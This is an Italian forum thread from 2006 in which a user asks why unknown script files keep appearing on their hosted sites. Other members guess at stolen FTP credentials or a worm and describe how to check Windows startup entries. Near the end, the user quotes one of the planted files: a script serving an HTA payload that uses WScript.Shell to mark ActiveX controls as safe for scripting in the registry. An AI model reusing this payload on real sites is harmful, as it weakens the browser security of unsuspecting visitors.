Creazione file sconosciuti (Aiuto!!!!!)

25-03-2006, 17.57.17

Uff

è da un pò di tempo che nel mio sito si creano file da soli!!!
allora pagina inziale originale si è trasformata in _index.php
mentre prima era solo index.php

Come devo Fare?HuhHuhHuh!?!?!?!
anche se li cancello dopo un pò di tempo ricompaiono!!!
cosa devo fareee!!!

i file che si creano da soli sono crechiati in rosso!!!

Questi sono i file vedeteli
http://www.amoga.altervista.org/a.asp
http://www.amoga.altervista.org/a.php
http://www.amoga.altervista.org/a.pl
http://www.amoga.altervista.org/a.asp
http://www.amoga.altervista.org/help.zip
http://www.amoga.altervista.org/index.php (Mi ha cambiato la pagina orginale)
infatti me la trasforma in _index.php

COSA DEVO FAREEE?

FunCool: Usa titoli che spiegano il problema.

**mythologia** · 25-03-2006, 18.00.10

Fatto stranissimo

**Gianluca** · 25-03-2006, 18.06.56

Non sono files che si creano da soli ma risulta evidente anche dai log di accesso che si tratti di una seconda persona che si connette e carica tali files.

Accertati di non aver dato anche involontariamente la tua password di accesso a nessuno, che la tua mailbox non sia letta da nessuno, di non avere scripts php (forum, CMS o altro) vulnerabili, ovviamente cambia la tua password di accesso in qualcosa di non intuibile.

25-03-2006, 18.14.58

Beh già ho cambiato la pass!!!
ma è la stessa cosa!!!
è poi sono sempre gli stessi file
secondo me è qualche script!!

25-03-2006, 18.16.06

e poi in tutti i miei siti escono !!!!

www.tuttomsn.altervista.org
www.amogaweb.altervista.org
www.amoga.altervista.org

**chrisbiro** · 25-03-2006, 18.23.08

Ciao, @Amoga non fare doppi posta ma usa il tasto edita!!

Ciao

**Gianluca** · 25-03-2006, 18.56.33

e poi in tutti i miei siti escono

Questo conferma ulteriormente la tesi esposta, che sia poi una persona fisica o uno script che si connette al tuo ftp e carica quei files poco importa.

25-03-2006, 19.16.40

Come faccio per levare questo script????

**Gianluca** · 25-03-2006, 19.35.12

Non è uno script nel tuo spazio ma può essere qualcuno che usa un software per automatizzare tali operazioni.

Ti ho scritto nel post precedente quanto puoi fare per porre rimedio al problema.

25-03-2006, 21.34.39

Potrebbe essere uno script,che apre una bella sessione ftp e fà un upload dei file,che a mio modesto parere sono malevoli.

Le possibilità che sia uno script sono del 95 %.

Ti spiego pure il perchè.

Su altervista come ben sappiamo i file .asp,non possono essere eseguiti perchè av usa il php,quindi per chiarire bene le cose lo script si comporta in questa maniera.

Entra dalla porta 21 (non nè sono sicuro cmq da qualche parte entra)

Apre una sessione collegandosi al server (può darsi ke sia anke una shell)

Copia gli eventuali files (che sicuramente stanno su un server che fà da relay)

Siccome è uno script copia tutti i file con le estensioni possibili in modo che se su un server non và il php usa l'asp ecc...

Rinomina un'eventuale index.php (NON LO SOSTITUISCE)

Mi è sembrato di vedere nel codice della pagine una specie di exploit che esegue un codice arbitrario,portandoti su un file hta.

Ecco dovè il vero problema il file .hta.

Non sò se questo file è un virus (nn credo).

Credo solo che funga da realay.

Cioè mi usa per infettare un'altro server,e possibilmente mi sniffa e prende le mie password di accesso ai server ftp (quindi è inutile che io cambi password).

Le possibilità che questo sia uno script molto ridicolo ci sono.
Ma attenzione che sono proprio le cose ridicole che fanno danno.

Caro amico t'invito a controllare dal registro di sistema i file che vengono avviati in automatico all'avvio.
Oppure prova col msconfig.

Una piccola deduzione.
Io penso che tu sei andato a fare un giro su astalavista e ti sei beccato un bel worm :D .
Ciaoo stammi bene

26-03-2006, 10.25.12

io sosterrei anche la tesi della persona fisica, ci sono molti programmi come c**** e a *****che attaccano il sistema e lo costringono a sputare la password
non sono sicuro del worm

26-03-2006, 11.07.41

Ho capito che lo script o l'eventuale worm
sfrutta l'index cioè la pagina iniziale
ma se si cambia nome il problema si risolve
infatti ho un sito dove non c'è index (Pagin Iniziale) e infatti non c'è nessun problema :)

Beh volevo chiedere se apposto di index
per mettere una pagina inziale ci sia qualche altro modo!!?!??!?!

PS: come faccio a controllare il registro di sistema e il msconfing ??

26-03-2006, 12.04.38

Start>esegui>msconfig

Si aprirà una finestrella.

Vai nella scheda Avvio.

Lì ci saranno tutti gli elementi che si avviano al caricamento di windows.

Se non vuoi che si avviino deselezionali.

__________________________________________________ _________

Start>esegui>regedit

HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Run

Una volta selezionata la cartellina Run appariranno accanto valori,questi valori servono ad avviare un programma specifico all'avvio di windows,solitamente prendono il nome del file exe.

__________________________________________________ _____________

Comunque così dovresti rimuovere l'eventuale programmino (chiamiamolo così per intenderci) che ti usa per entrare sul tuo server FTP.

Comunque io credo che la persona fisica che fà questo sei tu o meglio lo fà il tuo pc :D .

Stammi bene.

26-03-2006, 15.34.17

in effetti è vero specialmente se usi il dreamwever
anch'io certe volte trovo documenti nuovi ma li crea il programma stesso
ma mi sembra strano che li registri direttamente nel ftp

**silverseraph** · 26-03-2006, 17.05.22

Hai provato a visualizzare il contenuto di quei files?

26-03-2006, 17.07.35

Si dentro ci sono degli script!!

**funcool** · 26-03-2006, 17.18.23

Scusami, ma vedo che hai fatto uno scan sul tuo computer. Non è magari il programma che usi per fare i tuoi siti che crea quei file? O forse non ho capito niente io...

**seneca** · 26-03-2006, 17.28.59

vorrei fare una precisazione e dare un consiglio:
1) uso dreamveawer (non per l'FTP ma per creare e gestire pagine) e non mi è stata mai creato nulla che non volessi
2) con msconfig già puoi anche giocarci, in quanto devi solo selezionare/deselezionare processi di cui si può facilmente intuire la provenienza/utilità ma ti sconsiglio vivamente di toccare il registro di sistema, a meno che tu non ne abbia una buona conoscenza: alle brutte, se modifiche qualcosa che non avresti dovuto, puoi anche rischiare che non ti parta più il sistema!

26-03-2006, 18.33.19

Beh lo so !!!
c'è l'ho le conoscenze non ti preoccupare!

**silverseraph** · 26-03-2006, 20.11.29

Puoi linkare uno script di quelli?

26-03-2006, 22.06.11

Ecco uno dei tanti

print "Content-Type: application/hta;\r\n\r\n";print "<script language=vbs>self.MoveTo 0, 0
Set r=CreateObject(\"WScript.Shell\")
r.RegWrite \"HKCR\\CLSID\\{0D43FE01-F093-11CF-8940-00A0C9054228}\\Implemented Categories\\{7DD95801-9882-11CF-9FA9-00AA006C42C4}\\\",\"\",\"REG_SZ\"
r.RegWrite \"HKCR\\CLSID\\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\\Implemented Categories\\{7DD95801-9882-11CF-9FA9-00AA006C42C4}\\\",\"\",\"REG_SZ\"
self.Close
</script>";

Discussione: Creazione file sconosciuti (Aiuto!!!!!)

LinkBack

Strumenti discussione

Display

Creazione file sconosciuti (Aiuto!!!!!)

Basta controllare i log

Ti spiego tutto

Regole di scrittura